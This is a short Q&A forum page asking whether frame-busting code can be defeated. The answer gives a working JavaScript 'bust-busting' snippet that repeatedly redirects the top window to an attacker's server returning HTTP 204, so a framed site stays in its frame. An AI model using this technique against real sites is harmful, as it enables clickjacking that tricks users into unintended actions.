Can you beat a frame breaker?

Question

I haven't been able to find much of an answer yet, so I'm just going to ask.

How difficult would it be to stop a frame breaker from working - or even just ignore it?

Answer 1

As per Jeff's question:

As it turns out, your frame-busting code can be busted, as shown here:

<script type="text/javascript">
    var prevent_bust = 0  
    window.onbeforeunload = function() { prevent_bust++ }  
    setInterval(function() {  
      if (prevent_bust > 0) {  
        prevent_bust -= 2  
        window.top.location = 'http://server-which-responds-with-204.com'  
      }  
    }, 1)  
</script>

This code does the following:

• increments a counter every time the browser attempts to navigate away from the current page, via the window.onbeforeonload event handler
• sets up a timer that fires every millisecond via setInterval(), and if it sees the counter incremented, changes the current location to a server of the attacker's control
• that server serves up a page with HTTP status code 204, which does not cause the browser to navigate anywhere